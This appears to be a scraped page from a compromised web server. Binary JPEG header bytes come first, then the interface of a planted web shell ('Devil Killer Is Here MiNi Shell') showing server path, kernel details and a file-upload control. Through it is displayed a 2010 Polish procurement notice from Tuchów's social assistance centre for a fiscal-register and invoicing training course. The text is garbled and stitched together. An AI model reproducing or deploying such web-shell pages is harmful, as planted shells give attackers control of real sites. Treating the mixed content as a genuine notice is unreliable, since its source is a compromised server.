JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100921/299754-N-2010.html

<p class="kh_header"><b>Tuchów: Organizacja i przeprowadzenie szkolenia pn. Obsługa kas fiskalnych i podstawy obsługi programu do fakturowania dla osób zakwalifikowanych do udziału w projekcie systemowym pn. Kierunek - samodzielność i niezależność współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 299754 - 2010; data zamieszczenia: 21.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Jana Pawła II 4, 33-170 Tuchów, woj. małopolskie, tel. 14 6525489, faks 14 6525489.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkolenia pn. Obsługa kas fiskalnych i podstawy obsługi programu do fakturowania dla osób zakwalifikowanych do udziału w projekcie systemowym pn. Kierunek - samodzielność i niezależność współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja  i przeprowadzenie usługi szkoleniowej dla 14 osób będących klientami Ośrodka Pomocy Społecznej w Tuchowie - uczestników projektu systemowego pn. Kierunek - samodzielność i  niezależność w zakresie tematycznym: Obsługa kas fiskalnych  i podstawy obsługi programu do fakturowania. Szkolenie obejmowało będzie 30 godzin dydaktycznych, w tym 5 godzin zajęć teoretycznych i 25 godzin zajęć praktycznych.          Zakresem tematycznym obejmie:
I. Obsługa kas fiskalnych - minimum 10 godzin dydaktycznych, w tym zagadnienia:
- prawo podatkowe - prawo VAT, zasady podatku pośredniego, kwalifikacja towarów i usług do stawki podatku VAT, PKWiU, podstawowe grupy towarowe, obowiązki kasjera,
- rodzaj kas i systemów fiskalnych, ich zastosowanie w poszczególnych gałęziach gospodarki, sposoby prowadzenia sprzedaży na kasie fiskalnej,
- praktyczna obsługa sprzedaży przy użyciu kas i gastronomicznych systemów fiskalnych z wykorzystaniem grup towarowych, kodów towarowych, czytnika kodów kreskowych, rozliczanie finansowe i zamykanie doby fiskalnej, sprzedaż na drukarkach fiskalnych przy użyciu oprogramowania komputerowego typu POS, sporządzanie raportów miesięcznych i towarowych.
II. Fakturowanie z wykorzystaniem programu komputerowego - 20 godziny dydaktycznych, w tym zagadnienia:
- obowiązek wystawiania faktur, podmioty zobowiązane, dokumentowanie transakcji,
- podmioty, którym należy wystawić fakturę,
- kiedy należy wystawić fakturę - rodzaj transakcji, termin wystawiania faktur itp.,
- zasady wystawiania faktur, w tym treść i forma,
- rodzaje i zawartość dokumentów, ich dane: faktura VAT, E-faktury, faktury korygujące, noty korygujące, duplikaty faktur, anulowanie faktur, refakturowanie, korygowanie pomyłek itp.
- inne dodatkowe zagadnienia zaproponowane przez Wykonawcę i zatwierdzone przez Zamawiającego.
3.2. Ponadto Wykonawca zobowiązuje się:
1. Zapewnienia cateringu uczestnikom szkolenia. Przez catering rozumie się jeden gorący posiłek w czasie przerwy obiadowej, oraz napoje dostępne w trakcie zajęć. Koszt cateringu należy wliczyć w kalkulację kosztów szkolenia.
2. Przedłożyć szczegółowy program szkolenia, ze wskazaniem formy i metod nauczania, oraz ilością godzin teoretycznych i praktycznych - jako załącznik do oferty sporządzony w całości przez Wykonawcę.
3. Przedłożyć harmonogram zajęć szkoleniowych - z chwilą zawarcia umowy. Harmonogram obejmował będzie liczbę grup, liczbę osób w grupach, szczegółowy termin i rozkład zajęć. Harmonogram musi zostać zaakceptowany przez Zamawiającego w ciągu 7 dni od zawarcia umowy.
4. Prowadzić zajęcia w dniach od poniedziałku do piątku, w godzinach ustalonych z Zamawiającym po podpisaniu umowy (według opracowanego harmonogramu szkoleń), w wymiarze nieprzekraczającym 6 godzin dydaktycznych - 1 godzina dydaktyczna = 45 minut.
5. Zapewnić przerwę min. 30 minutową - obiadową i inne według zapotrzebowania uczestników szkolenia. Zajęcia nie mogą rozpoczynać się wcześniej niż o godzinie 8.00, a kończyć nie później niż o godzinie 17.00.
6. Do ubezpieczenia osób skierowanych na szkolenie od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem.
7. Zapewnić uczestnikom szkolenia niezbędny sprzęt, w tym kasy fiskalne, komputery z odpowiednim oprogramowaniem oraz inne narzędzia i materiały niezbędne do praktycznej części  szkolenia, wskazane przez Wykonawcę w formularzu ofertowym stanowiącym załącznik do oferty.
8. Zapewnić uczestnikom szkolenia materiały szkoleniowo - dydaktyczne, związane z tematyką, wskazane przez Wykonawcę w ofercie oraz oznakowania tych materiałów poprzez umieszczenie logotypu promującego projekt współfinansowany ze środków EFS: Program Operacyjny Kapitał Ludzki (POKL), Unii Europejskiej (UE) Europejskiego Funduszu Społecznego (EFS) oraz nazwy projektu - zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach POKL.
9. Niezwłocznie po ukończeniu szkolenia do wydania każdemu uczestnikowi zaświadczeń/certyfikatów potwierdzających ukończenie szkolenia z logotypami: POKL, UE i EFS oraz nazwą projektu - zgodnie  z wytycznymi dotyczącymi oznakowania projektów w ramach POKL. Zaświadczenia/ certyfikaty będą podpisane i opieczętowane przez Wykonawcę lub osobę upoważnioną. Dostarczyć Zamawiającemu kopie wydanych zaświadczeń/certyfikatów oraz imienną listę potwierdzającą ich otrzymanie.
10.  Prowadzić szkolenie na terenie miasta Tuchowa.
11. Prowadzić listy obecności (potwierdzenie obecności przez uczestnika własnoręcznym podpisem), a także do rejestrowania i niezwłocznego zgłaszania Zamawiającemu najpóźniej w następnym dniu wszystkich nieobecności uczestników zajęć lub rezygnacji z uczestnictwa w zajęciach (pod rygorem odmowy zapłaty za szkolenie tych osób).
12. Prowadzić dziennik zajęć edukacyjnych. Dziennik ma zawierać imię i nazwisko uczestnika, wymiar godzin i tematy zajęć edukacyjnych, z podpisami wykładowy/ów lub trenera/ów prowadzących zajęcia.
13. Prowadzić rejestry/listy odbioru materiałów szkoleniowo- dydaktycznych przez uczestników zajęć i przekazać je wraz z kopią przekazanych materiałów Zamawiającemu po zakończeniu szkoleń. 
14. Przeprowadzać wśród uczestników szkolenia ankiet służących do jego oceny. Wypełnione przez uczestników szkolenia ankiety (ex-ante i ex-post) oraz ich analizę należy dostarczyć Zamawiającemu.
15. Przekazać Zamawiającemu kopię listy obecności raz w tygodniu, a oryginał po zakończeniu zajęć - niezwłocznie.
3.3. Wykonawca wskaże w ofercie tę część zamówienia, której wykonanie powierzy podwykonawcom. 
3.5.  Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia kursantów - na każdym etapie. Do kontroli Wykonawcy w zakresie przebiegu zajęć oraz prawidłowości realizacji przedmiotu umowy mają prawo również Instytucja Wdrażająca/Pośrednicząca oraz inne podmioty uprawnione..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować uprawnienia do występowania w obrocie prawnym - aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust 1 pkt 2 ustawy,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt 2 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowania co  najmniej 2 usług obejmujących swym zakresem usługi szkoleniowe w zakresie obsługi kasy fiskalnej i programów fakturujących - ocena tego warunku dokonana będzie na podstawie wykazu wykonywanych usług w zakresie przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby każda osoba wyznaczona do prowadzenia zajęć stanowiących przedmiot zamówienia  posiada co najmniej roczny staż pracy oraz posiada kwalifikacje  uprawniające do prowadzenia zajęć w tematyce organizowanego szkolenia (licencje).
Ocena tych warunków będzie dokonywana w oparciu o wykaz osób przewidzianych do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia przez Wykonawcę oświadczenia, iż znajduje się w dobrej kondycji finansowej i ekonomicznej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie potwierdzające dobrą kondycje finansową i ekonomiczną Wykonawcy. 
-Wskazanie części zamówienia, która zostanie powierzona podwykonawcy- jeżeli dotyczy. 
-Pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonywania zamówienia - jeżeli Wykonawca wskazał zadania powierzone podwykonawcy.
-Dokument pełnomocnictwa oraz wykaz osób uprawnionych do reprezentacji Wykonawcy. 
- Szczegółowy program szkolenia, ze wskazaniem formy i metod nauczania, oraz ilością godzin teoretycznych i praktycznych. 
-Wykaz sprzętu, narzędzi i materiałów szkoleniowo - dydaktycznych do teoretycznej i praktycznej realizacji przedmiotu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie  wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuchow.pl BIP Gminy Tuchów / zakładka zamówienia publiczne i ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Tuchowie, ul.Jana Pawła II 4, 33-170 Tuchów, I piętro pok.12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Tuchowie,ul. Jana Pawła II 4,33-170 Tuchów, pokój nr 11, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach działania 7.1, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com